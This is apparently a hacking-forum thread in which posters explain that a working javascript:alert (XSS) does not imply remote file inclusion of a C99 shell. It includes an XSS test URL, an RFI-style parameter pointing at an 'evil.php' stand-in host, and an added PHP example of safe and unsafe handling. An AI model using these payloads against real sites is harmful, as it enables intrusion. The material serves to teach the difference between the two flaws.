Does javascript alert always mean


ghost's Avatar
0 0

Hey, I was just curious to know if when javascript:alert is used and works on a site. Does this always mean that you can run a shell through the site or not all the time?


spyware's Avatar
Banned
0 0

It means you don't understand a thing about the subject you are studying.


ghost's Avatar
0 0

That's what I figured.


ghost's Avatar
0 0

Yeah man, learn a bit about JavaScript injections. Things will make more sense then.

To answer your question directly, no.

JavaScript injections have nothing to do with running a shell on a site.


ghost's Avatar
0 0

No man, sorry. That's not what I mean. I was saying would the fact that javascript:alert works. Does this mean I could inject a shell such as C99 through a javascript snippet which runs the remote page locally. Like ?page=www.site.com/shell


ghost's Avatar
0 0

Nope. Think about it logically. You can javascript:alert any page (like for example this hbh page) so it wouldn't make much sense if you could then open up a shell on hbh because it is obviously a pretty secure website. If it was that easy there'd be nothing to taking over any site.


yours31f's Avatar
Retired
10 0

Right, all you're doing is saying "make a popup"


GTADarkDude's Avatar
Member
0 0

I think that's not what he means either. I think that what he asks is when a page is vulnerable to XSS, which you can test with a JavaScript alert, whether you can also include a C99 shell. Am I right?


ghost's Avatar
0 0

index.php?id=<script>alert("abc");</script>

While the above may work, the below may not, and vice versa.

index.php?id=http://www.mysite.com/evil.php


Uber0n's Avatar
Member
0 0

This thread made me confused, but I suppose the answer you're looking for is something like this: **"Just because you can put javascript injections in the URL bar no matter what site you're visiting, it doesn't mean the site is vulnerable to RFI. Javascript is client-side scripts and PHP is server-side."**
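
The distinction the thread arrives at, as an added example that is not part of any post: a hypothetical index.php has two unrelated sinks, one that writes the parameter into HTML (the XSS case) and one that uses it to pick a file for include() (the RFI case), and each needs its own control. The function names, the `PAGES` allow-list and the sample inputs are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Added illustration: hypothetical handlers for index.php, not code from the thread.

// Sink 1 (client side): the value is written into the HTML response.
function render_unsafe(string $id): string {
    return '<p>Item: ' . $id . '</p>';   // markup in $id reaches the browser as markup
}
function render_safe(string $id): string {
    // Output encoding: the browser shows the value as text instead of parsing it.
    return '<p>Item: ' . htmlspecialchars($id, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</p>';
}

// Sink 2 (server side): the value selects a file for include().
const PAGES = ['home' => 'pages/home.php', 'about' => 'pages/about.php']; // constructed allow-list

function include_target_unsafe(string $page): string {
    return $page;                        // include($page) would follow whatever path was supplied
}
function include_target_safe(string $page): ?string {
    return PAGES[$page] ?? null;         // only known keys map to a file; anything else is rejected
}

// Constructed sample inputs: the two parameter values quoted in the thread plus a normal one.
$samples = ['<script>alert("abc");</script>', 'http://www.mysite.com/evil.php', 'about'];

foreach ($samples as $value) {
    echo "input:         $value\n";
    echo "  html unsafe: " . render_unsafe($value) . "\n";
    echo "  html safe:   " . render_safe($value) . "\n";
    echo "  incl unsafe: " . include_target_unsafe($value) . "\n";
    echo "  incl safe:   " . (include_target_safe($value) ?? '(rejected)') . "\n";
}

// Remote inclusion additionally depends on this php.ini setting, which is off by default.
$remote = filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
echo 'allow_url_include: ' . ($remote ? 'On' : 'Off') . "\n";
```

Encoding the output changes nothing about the include path, and the allow-list changes nothing about what is echoed into the page, which is why a working alert says nothing about file inclusion.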